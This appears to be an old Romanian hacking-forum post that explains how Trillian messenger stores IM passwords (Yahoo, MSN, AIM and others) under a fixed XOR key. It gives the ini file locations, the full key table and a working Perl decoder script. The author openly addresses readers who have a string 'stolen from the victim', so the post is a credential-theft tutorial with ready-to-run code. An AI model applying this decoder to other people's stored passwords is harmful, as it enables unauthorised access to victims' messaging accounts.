TE4L
Super Buruian
Inregistrat: acum 17 ani
Postari: 356
|
|
Am gasit o chestie care sper sa va foloseasca. Dupa cum spune si titlul este metoda de a decripta o parola de yahoo,msn,aol,icq,mirc etc stocata in programul trilian. Pt inceput trebuie sa stiti ca parola se afla in folderul de instalare trilian (default c:program filestrilianusersdefault) in fisierul pe care il doriti adica - aim.ini,msn.ini,yahoo.ini etc. Cand deschideti aceste fisiere veti vedea ceva de genul [msn] auto reconnect=1 save passwords=1 idle time=15 show buddy status=1 port=1863 server=messenger.hotmail.com last msn= connect num=10 connect sec=60 save status=1 ft port=6891 [profile 0] name= password=A347F2B74EE9A9F6.
Linia "password=blablabla" e cea care va intereseaza. In ciuda faptului ca trilian este un program foarte bun,parolele sunt criptate ptin banala metoda xor. Sirul de caractere pe care l-ati vazut reprezinta criptarea xor a parolei originale sub forma hexazecimala. Daca descompuneti sirul in grupuri de cate 2 veti vedea ce vreau sa spun -> A3 47 F2 B7 4E E9 A9 F6.
Cei care cunosc sistemul de numeratie hex si-au dat deja seama ca a3 estede fapt 163.Fara sa o mai lungesc mult trebuie sa va spun ca fiecare litera a parolei este criptata cu o valoare defalut,care nu poate fi schimbata. Prima litera a parolei este combinata cu 243,a 2-a cu 038 etc. Deci ca sa spargem parola trebuie doar sa facem operatiile in ordine inversa. Adica X(prima litera a parolei) xor 243 = 163.
Cred ca va dati deja seama cat de usor a devenit de spart aceasta parola. Hex key-urile pt fiecare litera a parolei sunt "243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000".
Cum de obicei o parola nu depaseste 5-10 caractere nu veti avea niciodata nevoie de toate. Ca sa va fie mai usor aveti aici si un script in perl,trebuie doar compilat,si va decripteaza parola. A,inlocuiti PAROLA cu sirul de caractere pe care l-ati furat de la victima .
Code:
#!/usr/bin/perl
#################
# Trillian Password Decoder
#################
$encrypted = "PAROLA"; # aici puneti parola voastra
$xorkeys = "243, 038, 129, 196, 057, 134, 219,
146, 113, 163, 185, 230, 083, 122, 149, 124,
000, 000, 000, 000, 000, 000, 255, 000, 000,
128, 000, 000, 000, 128, 128, 000, 255, 000,
000, 000, 128, 000, 128, 000, 128, 128, 000,
000, 000, 128, 255, 000, 128, 000, 255, 000,
128, 128, 128, 000, 085, 110, 097, 098, 108,
101, 032, 116, 111, 032, 114, 101, 115, 111,
108, 118, 101, 032, 072, 084, 084, 080, 032,
112, 114, 111, 120, 000";
$pointer = 0;
@keys = split(/, /, $xorkeys);
print "Parola decriptata ";
foreach $key (@keys)
{
$passchar = chr(hex(substr($encrypted, $pointer, 2)) ^ $key);
print "$passchar";
last if ($pointer == length($encrypted) - 2);
$pointer += 2;
}
exit; |
Modificat de DarthSion (acum 17 ani)
_______________________________________
Beware of the buruian( he is ... super )
|
|